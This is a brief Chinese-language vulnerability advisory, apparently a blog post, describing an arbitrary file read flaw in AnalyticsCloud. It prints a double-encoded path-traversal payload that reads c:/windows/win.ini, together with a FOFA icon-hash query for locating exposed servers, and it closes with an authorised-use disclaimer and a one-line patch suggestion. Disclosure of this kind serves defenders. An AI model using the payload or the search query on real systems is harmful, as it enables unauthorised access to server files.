影响范围
AnalyticsCloud分析云
漏洞概述
AnalyticsCloud分析云存在任意文件读取
漏洞复现
应用界面如下所示:
漏洞执行示例:
/.%252e/.%252e/c:/windows/win.ini
资产测绘
FOFA:
icon_hash="888607769"
免责声明
本篇文章提及的漏洞POC仅限于安全人员在授权的情况下对业务系统进行测评验证,由于传播、利用本篇文章中提及的漏洞POC进行未授权的非法攻击测试造成的法律责任均由使用者本人负责,本人不为此承担任何责任
修复建议
升级到打补丁~